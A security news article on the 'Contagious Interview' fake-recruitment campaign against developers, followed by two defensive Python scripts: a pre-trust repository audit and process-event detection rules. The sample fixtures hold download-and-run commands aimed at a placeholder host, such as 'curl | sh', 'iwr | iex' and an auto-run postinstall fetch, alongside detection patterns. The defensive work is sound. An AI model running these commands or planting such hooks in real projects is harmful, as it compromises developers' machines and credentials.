A recent report from Microsoft Defender Experts sheds light on the “Contagious Interview” campaign, a sophisticated social engineering operation that has been quietly targeting software developers since at least December 2022.
This campaign represents a calculated shift in how attackers gain entry to corporate networks. By “abusing the trust inherent in modern recruitment workflows,” threat actors are successfully bypassing traditional defenses by hiding in plain sight.
Victims aren’t just sent a malicious link; they are brought into a “convincingly staged recruitment process” that mirrors the real world, complete with recruiter outreach and technical discussions.
The trap is typically sprung during the “assignment” phase. Attackers, posing as recruiters from cryptocurrency or AI firms, instruct developers to perform routine tasks that lead to infection:
- Malicious Packages: Victims are asked to clone and execute NPM packages from platforms like GitHub or Bitbucket.
- IDE Exploitation: In newer versions of the attack, hackers leverage Visual Studio Code workflows. Once a victim “trusts” a downloaded repository, the IDE automatically executes a task configuration file that fetches a backdoor.
- Fabricated Errors: Some campaigns direct users to a fake screening website that throws a “technical error”. The victim is then told to copy and paste a command to “fix” the issue—a command that actually installs malware.
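The two repository-based vectors above share one property: code runs before the developer consciously executes anything, either through npm lifecycle hooks during `npm install` or through a VS Code task configured to start on folder open once the workspace is trusted. The following audit script is an added example, not code from the Microsoft report or from any tool it names. It walks a cloned checkout before installing or trusting it and flags both auto-execution paths. The detection patterns and the sample repository it builds are constructed for illustration; `example.invalid` is a placeholder host.

```python
"""Pre-trust audit of a cloned "coding assignment" repository.

Added example, not code from the Microsoft report or any tool it names.
It flags the two auto-execution paths the article describes: npm lifecycle
hooks that run during `npm install`, and VS Code tasks with
runOptions.runOn = "folderOpen" that start once the workspace is trusted.
The SUSPICIOUS patterns are constructed heuristics, not a published ruleset.
"""
import json
import os
import re
import tempfile

# Real npm behaviour: these lifecycle hooks run automatically on `npm install`.
NPM_AUTO_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristic: a screening task's build hook rarely needs any of these.
SUSPICIOUS = re.compile(
    r"(https?://|\bcurl\b|\bwget\b|powershell|Invoke-WebRequest|\biwr\b|"
    r"\bnode\s+-e\b|\beval\b|base64|child_process)",
    re.IGNORECASE,
)


def load_jsonc(text):
    """Parse JSON, tolerating // and /* */ comments plus trailing commas,
    because VS Code reads tasks.json as JSONC rather than strict JSON."""
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        text = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)
        text = re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)
        text = re.sub(r",\s*([}\]])", r"\1", text)
        return json.loads(text)


def _finding(source, where, command, severity, reason):
    return {"source": source, "where": where, "command": command,
            "severity": severity, "reason": reason}


def audit_package_json(path, source):
    """Report npm hooks that run without the developer invoking them."""
    with open(path, encoding="utf-8") as fh:
        scripts = load_jsonc(fh.read()).get("scripts") or {}
    out = []
    for hook in NPM_AUTO_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        if SUSPICIOUS.search(cmd):
            out.append(_finding(source, hook, cmd, "high",
                                "auto-run install hook fetches or evals code"))
        else:
            out.append(_finding(source, hook, cmd, "info",
                                "auto-run install hook present; review before installing"))
    return out


def audit_tasks_json(path, source):
    """Report VS Code tasks that start automatically when the folder is opened and trusted."""
    with open(path, encoding="utf-8") as fh:
        data = load_jsonc(fh.read())
    out = []
    for task in data.get("tasks") or []:
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = task.get("command", "")
        text = cmd if isinstance(cmd, str) else json.dumps(cmd)  # platform-specific forms are objects
        text = " ".join([text] + [str(a) for a in task.get("args") or []])
        sev = "high" if SUSPICIOUS.search(text) else "medium"
        out.append(_finding(source, task.get("label", "<unlabelled>"), text, sev,
                            "task auto-runs on folderOpen once the workspace is trusted"))
    return out


def audit_repo(root):
    """Walk a checkout (skipping node_modules) and collect findings from both file types."""
    findings = []
    for dirpath, dirs, files in os.walk(root):
        dirs[:] = [d for d in dirs if d != "node_modules"]
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name == "package.json":
                findings.extend(audit_package_json(full, rel))
            elif name == "tasks.json" and os.path.basename(dirpath) == ".vscode":
                findings.extend(audit_tasks_json(full, rel))
    return findings


def build_sample_repo():
    """Constructed sample checkout mimicking a staged assignment (placeholder host example.invalid)."""
    root = tempfile.mkdtemp(prefix="screening-task-")
    os.makedirs(os.path.join(root, ".vscode"))
    os.makedirs(os.path.join(root, "lib"))
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "screening-task", "scripts": {
            "test": "jest",
            "postinstall": "node -e \"require('https').get('https://example.invalid/stage2')\""}}, fh)
    with open(os.path.join(root, "lib", "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "lib", "scripts": {"build": "tsc -p ."}}, fh)  # benign: no auto hooks
    with open(os.path.join(root, ".vscode", "tasks.json"), "w", encoding="utf-8") as fh:
        fh.write('{\n  // JSONC comment, as VS Code allows\n  "version": "2.0.0",\n'
                 '  "tasks": [{"label": "setup", "type": "shell",\n'
                 '    "command": "curl -s https://example.invalid/setup.sh | sh",\n'
                 '    "runOptions": {"runOn": "folderOpen"},}]\n}')
    return root


if __name__ == "__main__":
    for f in audit_repo(build_sample_repo()):
        print(f"[{f['severity']}] {f['source']} ({f['where']}): {f['reason']} :: {f['command']}")
```

Run it against any assignment repository before `npm install` or before clicking "Trust" in the IDE. Two complementary host-side settings reduce the blast radius regardless of what the audit finds: `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops lifecycle hooks from running at all, and the VS Code setting `"task.allowAutomaticTasks": "off"` prevents folderOpen tasks from starting even in a trusted workspace.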
Once the developer lowers their guard, a suite of modular backdoors takes over. The report highlights several key players:
- OtterCookie: A “stealthy backdoor” used for detailed system reconnaissance and stealing credentials.
- Invisible Ferret: A Python-based tool used for “remote command execution, extended system reconnaissance, and persistent control”.
- FlexibleFerret: A modular backdoor (available in Go and Python) that establishes persistence by modifying registry keys.
Interestingly, the code quality of these tools is often unrefined. Microsoft observed “inconsistent error handling” and “tutorial-style comments,” suggesting a development process that “prioritizes speed and functional output over refined engineering”—potentially aided by AI-assisted coding tools.
This isn’t just about stealing a single laptop. By compromising a developer’s endpoint, threat actors gain a foothold into the “crown jewels” of an enterprise: source code, CI/CD pipelines, and production infrastructure. From there, they harvest everything from cloud credentials and API tokens to cryptocurrency wallets.
To counter this, Microsoft Defender Experts advises that “organizations should treat recruitment workflows as attack surfaces”. Recommendations include using isolated environments for coding tests and closely monitoring developer build tools for suspicious dependency execution.
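The monitoring recommendation above becomes concrete once it is written as rules over process-creation telemetry. The detection below is an added example, not code from the Microsoft report, and encodes two behaviours the article describes: developer tooling (the IDE, node, npm) spawning a child that fetches or inline-evaluates code, and a shell command that pipes a download straight into an interpreter, which is the "paste this command to fix the error" vector. The event records and the placeholder host `example.invalid` are constructed; the field names are assumptions, not a specific EDR schema.

```python
"""Rules over process-creation events from developer workstations.

Added example, not from the Microsoft report. Field names (parent_image,
image, command_line) are assumptions rather than a specific EDR schema, and
every event in SAMPLE_EVENTS is constructed; example.invalid is a placeholder.
"""
import os
import re

# Parents worth scrutinising: the IDE and the package tooling a coding test runs through.
DEV_TOOL_PARENTS = {"code", "code.exe", "node", "node.exe", "npm", "npm.cmd",
                    "npx", "yarn", "pnpm"}

URL = re.compile(r"https?://", re.IGNORECASE)
# Inline-code or encoded-command switches and "pipe into interpreter" idioms.
INLINE_EXEC = re.compile(
    r"(\s-e\s|\s-c\s|-EncodedCommand|\s-enc\s|Invoke-Expression|\|\s*(iex|sh|bash)\b)",
    re.IGNORECASE)
PIPE_TO_INTERP = re.compile(
    r"\|\s*(iex|Invoke-Expression|sh|bash|zsh|python\d?|node)\b", re.IGNORECASE)


def _base(image):
    """Normalise a Windows or POSIX image path to its lower-case basename."""
    return os.path.basename(image.replace("\\", "/")).lower()


def classify(event):
    """Return the list of rule names an event triggers (empty if benign)."""
    cmd = event["command_line"]
    reasons = []
    # Rule 1: IDE/package tooling spawning something that reaches out or evals inline code.
    if _base(event["parent_image"]) in DEV_TOOL_PARENTS and (
            URL.search(cmd) or INLINE_EXEC.search(cmd)):
        reasons.append("dev-tool-spawned-fetch-or-inline-exec")
    # Rule 2: download piped directly into an interpreter, whatever the parent.
    if URL.search(cmd) and PIPE_TO_INTERP.search(cmd):
        reasons.append("download-piped-to-interpreter")
    return reasons


def detect(events):
    """Run every event through the rules; return alerts with the event id and reasons."""
    return [{"id": e["id"], "image": _base(e["image"]), "reasons": r}
            for e in events if (r := classify(e))]


# Constructed telemetry: 1-3 model the campaign's vectors, 4-5 are ordinary build activity.
SAMPLE_EVENTS = [
    {"id": 1,
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -NoProfile -c "iwr https://example.invalid/a.ps1 | iex"'},
    {"id": 2, "parent_image": "/usr/bin/npm", "image": "/usr/bin/node",
     "command_line": "node -e \"require('https').get('https://example.invalid/stage2')\""},
    {"id": 3, "parent_image": "/usr/bin/gnome-terminal", "image": "/bin/bash",
     "command_line": 'bash -c "curl -fsSL https://example.invalid/fix.sh | bash"'},
    {"id": 4, "parent_image": "/usr/bin/npm", "image": "/usr/bin/node",
     "command_line": "node node_modules/.bin/jest --ci"},
    {"id": 5, "parent_image": "/usr/share/code/code", "image": "/usr/bin/node",
     "command_line": "node /home/dev/app/scripts/build.js"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Events 4 and 5 show why the parent-process condition alone is not enough: npm and VS Code spawn node constantly during legitimate work, so the rule only fires when the child also carries a URL or an inline-execution switch. Rule 2 deliberately ignores the parent, since the fake screening site's "fix" command is pasted into whatever terminal the developer has open.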